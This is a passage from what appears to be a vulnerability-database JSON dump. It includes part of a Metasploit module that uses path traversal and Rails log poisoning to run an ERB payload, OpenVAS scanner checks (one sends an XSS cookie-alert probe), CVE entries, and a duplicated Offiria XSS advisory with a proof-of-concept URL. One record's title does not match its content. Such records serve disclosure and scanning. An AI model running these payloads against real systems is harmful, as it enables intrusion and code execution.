'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptString.new('URIPATH', [ true, 'The path to the vulnerable route', \"/user\"]),\r\n OptString.new('LOGFILE', [ true, 'The environment\\'s log file', 'log%2fdevelopment%2elog']),\r\n OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'GET', ['GET', 'POST', 'PUT'] 
]),\r\n OptString.new('COOKIES', [ false, 'HTTP headers, including auth headers and cookies', ''])\r\n ], self.class)\r\n end\r\n\r\n def vuln\r\n desired_location = 'Gemfile'\r\n\r\n # Initial payload\r\n p = desired_location\r\n\r\n # Search for depth up to 10 to detect if server is vuln\r\n 11.times do |i|\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n\r\n # Check if response contains Gemfile info\r\n if res.body.match(/^gem /)\r\n @depth = i\r\n print_good(\"It appears that this application is vulnerable\")\r\n return true\r\n end\r\n\r\n # Prepare next payload\r\n p = @@trav_string + p\r\n end\r\n return false\r\n end\r\n\r\n def send_payload\r\n p = datastore['LOGFILE']\r\n (@depth).times do |i|\r\n p = @@trav_string + p\r\n end\r\n\r\n p = p + \"?p=%3c%25%20%60\" + CGI::escape(payload.encoded) + \"%60%25%3e\"\r\n print_status(\"Sending payload: #{p}\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n end\r\n\r\n def render_log\r\n p = datastore['LOGFILE']\r\n (@depth).times do |i|\r\n p = @@trav_string + p\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n end\r\n\r\n #\r\n # Send the actual request\r\n #\r\n def exploit\r\n print_status(\"Sending initial request to detect exploitability\")\r\n\r\n # Check if vulnerable\r\n if vuln\r\n print_status(\"Attempting to exploit\")\r\n \r\n send_payload\r\n else\r\n print_error(\"Application does not appear vulnerable\")\r\n end\r\n end\r\nend\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-90633"}], "openvas": [{"lastseen": 
"2019-05-29T18:36:51", "bulletinFamily": "scanner", "description": "The host is running Offiria and is prone\n to cross site scripting vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-05-27T00:00:00", "id": "OPENVAS:1361412562310805191", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805191", "title": "Offiria Cross-Site Scripting Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_offiria_cross_site_scripting_vuln.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Offiria Cross-Site Scripting Vulnerability\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:slashes&dots:offria\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805191\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2014-2689\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 16:23:32 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_name(\"Offiria Cross-Site Scripting Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is running Offiria and is prone\n to cross site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to insufficient sanitization\n of user-supplied data in URI after '/installer/index.php' script is not\n removed from the system by default.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to create a specially crafted request that would execute arbitrary\n script code in a user's browser session within the trust relationship between\n their browser and the server.\");\n\n script_tag(name:\"affected\", value:\"Offiria version 2.1.1 and probably prior.\");\n\n script_tag(name:\"solution\", value:\"As a workaround remove the vulnerable\n script or restrict access to it via .htaccess file or WAF.\");\n\n 
script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23210\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/532048\");\n script_xref(name:\"URL\", value:\"http://www.zerodaylab.com/vulnerabilities/CVE-2014/CVE-2014-2689.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_offiria_remote_detect.nasl\");\n script_mandatory_keys(\"offiria/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://offiria.com\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appDir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = appDir + '/installer/index.php/\"onmouseover=\"alert(document.cookie) ;\"=\">';\n\nif(http_vuln_check(port:http_port, url:url, check_header:TRUE,\n pattern:\"alert\\(document.cookie\\)\", extra_check:\">Offiria Installation<\"))\n{\n report = report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:39", "bulletinFamily": "scanner", "description": "This host is installed with OrbiTeam BSCW and is prone to information\n disclosure vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2014-05-16T00:00:00", "id": "OPENVAS:1361412562310804297", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804297", "title": "OrbiTeam BSCW 'op' Parameter Information Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_orbiteam_bscw_info_disc_vuln.nasl 
11974 2018-10-19 06:22:46Z cfischer $\n#\n# OrbiTeam BSCW 'op' Parameter Information Disclosure Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804297\");\n script_version(\"$Revision: 11974 $\");\n script_cve_id(\"CVE-2014-2301\");\n script_bugtraq_id(67284);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:22:46 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-16 11:22:00 +0530 (Fri, 16 May 2014)\");\n script_name(\"OrbiTeam BSCW 'op' Parameter Information Disclosure Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with OrbiTeam BSCW and is prone to information\n disclosure vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Send the crafted HTTP GET request and check is it possible to read\n the filename of a document.\");\n script_tag(name:\"insight\", value:\"The flaw exists as the program associates filenames of documents with values\n 
mapped from the 'op' parameter.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to gain sensitive\n information by enumerating the names of all objects stored in BSCW without prior authentication.\");\n script_tag(name:\"affected\", value:\"OrbiTeam BSCW before version 5.0.8\");\n script_tag(name:\"solution\", value:\"Upgrade to OrbiTeam BSCW version 5.0.8 or later.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2014/May/37\");\n script_xref(name:\"URL\", value:\"https://xforce.iss.net/xforce/xfdb/93030\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/126551\");\n script_xref(name:\"URL\", value:\"https://www.redteam-pentesting.de/en/advisories/rt-sa-2014-003\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_xref(name:\"URL\", value:\"http://www.bscw.de/english/product.html\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nbscwPort = get_http_port(default:80);\n\nrcvRes = http_get_cache(item:\"/\", port:bscwPort);\n\nif(\">BSCW administrator<\" >!< rcvRes){\n exit(0);\n}\n\nreq = http_get(item:\"/pub/bscw.cgi/?op=inf\", port:bscwPort);\nrcvRes = http_keepalive_send_recv(port:bscwPort, data:req, bodyonly:TRUE);\nif('\"banner ruled_banner\"' >< rcvRes)\n{\n ##Grab the relocated link\n rcvRes = eregmatch(pattern:'The document can be found <A HREF=\"' +\n 'http://.*(/pub/bscw.cgi/(.*)/?op=inf)\">here', string:rcvRes);\n if(rcvRes[1]){\n url = rcvRes[1];\n }\n\n req = http_get(item:url, port:bscwPort);\n rcvRes = http_keepalive_send_recv(port:bscwPort, data:req, bodyonly:TRUE);\n 
if(\"server_logo_bscw.jpg\" >< rcvRes)\n {\n rcvRes = eregmatch(pattern:'The document can be found <A HREF=\"' +\n 'http://.*(/pub/bscw.cgi/(.*)/?op=inf)\">here', string:rcvRes);\n if(rcvRes[1]){\n url = rcvRes[1];\n }\n\n req = http_get(item:url, port:bscwPort);\n rcvRes = http_send_recv(port:bscwPort, data:req, bodyonly:TRUE);\n\n if(rcvRes && rcvRes =~ '<td.*class=\"iValueB\".*width=.*\">(.*)</td>')\n {\n security_message(port:bscwPort);\n exit(0);\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:46", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-04-10T00:00:00", "id": "OPENVAS:1361412562310867678", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867678", "title": "Fedora Update for mediawiki FEDORA-2014-4511", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4511\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867678\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:15:34 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4511\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-4511\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131306.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:57", "bulletinFamily": "scanner", "description": "Check for the Version of mediawiki", "modified": "2017-07-10T00:00:00", "published": "2014-04-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867675", "id": "OPENVAS:867675", "title": "Fedora Update for mediawiki FEDORA-2014-4478", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4478\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867675);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:14:56 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4478\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. 
Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4478\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131292.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:22", "bulletinFamily": "scanner", "description": "Check for the Version of mediawiki", "modified": "2017-07-10T00:00:00", "published": "2014-04-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867678", "id": "OPENVAS:867678", "title": "Fedora Update for mediawiki FEDORA-2014-4511", "type": "openvas", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4511\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867678);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:15:34 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4511\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. 
Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki-1.21.8/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4511\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131306.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2019-05-29T18:13:44", "bulletinFamily": "NVD", "description": "OrbiTeam BSCW before 5.0.8 allows remote attackers to obtain sensitive metadata via the inf operations (op=inf) to an object in pub/bscw.cgi/.", "modified": "2018-10-09T19:43:00", "id": "CVE-2014-2301", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2301", "published": "2014-05-12T14:55:00", "title": 
"CVE-2014-2301", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:13:45", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in Offiria 2.1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to installer/index.php.", "modified": "2018-10-09T19:43:00", "id": "CVE-2014-2689", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2689", "published": "2014-05-08T14:29:00", "title": "CVE-2014-2689", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23210\r\nProduct: Offiria\r\nVendor: Slashes &amp; Dots Sdn Bhd.\r\nVulnerable Version(s): 2.1.0 and probably prior\r\nTested Version: 2.1.0\r\nAdvisory Publication: April 2, 2014 [without technical details]\r\nVendor Notification: April 2, 2014 \r\nPublic Disclosure: May 7, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-2689\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Offiria, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users of vulnerable application.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Offiria: CVE-2014-2689\r\n\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data in URI after "/installer/index.php" script that is not removed from the system by default. 
A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\n\r\nThe following exploitation example displays "immuniweb" word:\r\n\r\nhttp://[host]/installer/index.php/%22onmouseover%3d%22alert%28%27immuniweb%27%29;%22%3d%22%3E\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nCurrently we are not aware of any official solution for this vulnerability. The vendor did not respond to:\r\n- 6 notifications by email\r\n- 1 notification via twitter\r\n- 1 notification via GitHub\r\n\r\nAs a temporary solution it is recommended to remove the vulnerable script or restrict access to it via .htaccess file or WAF. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23210 - https://www.htbridge.com/advisory/HTB23210 - Cross-Site Scripting (XSS) in Offiria.\r\n[2] Offiria - https://offiria.com - Offiria is a private, secure Enterprise Social Network for your organization.\r\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[4] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2014-05-10T00:00:00", "published": "2014-05-10T00:00:00", "id": "SECURITYVULNS:DOC:30716", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30716", "title": "[oss-security] CVE Request ---- SOAPpy 0.12.5 Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23210\r\nProduct: Offiria\r\nVendor: Slashes &amp; Dots Sdn Bhd.\r\nVulnerable Version(s): 2.1.0 and probably prior\r\nTested Version: 2.1.0\r\nAdvisory Publication: April 2, 2014 [without technical details]\r\nVendor Notification: April 2, 2014 \r\nPublic Disclosure: May 7, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-2689\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Offiria, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users of vulnerable application.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Offiria: CVE-2014-2689\r\n\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data in URI after "/installer/index.php" script that is not removed from the system by default. 
A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\n\r\nThe following exploitation example displays "immuniweb" word:\r\n\r\nhttp://[host]/installer/index.php/%22onmouseover%3d%22alert%28%27immuniweb%27%29;%22%3d%22%3E\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nCurrently we are not aware of any official solution for this vulnerability. The vendor did not respond to:\r\n- 6 notifications by email\r\n- 1 notification via twitter\r\n- 1 notification via GitHub\r\n\r\nAs a temporary solution it is recommended to remove the vulnerable script or restrict access to it via .htaccess file or WAF. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23210 - https://www.htbridge.com/advisory/HTB23210 - Cross-Site Scripting (XSS) in Offiria.\r\n[2] Offiria - https://offiria.com - Offiria is a private, secure Enterprise Social Network for your organization.\r\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[4] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
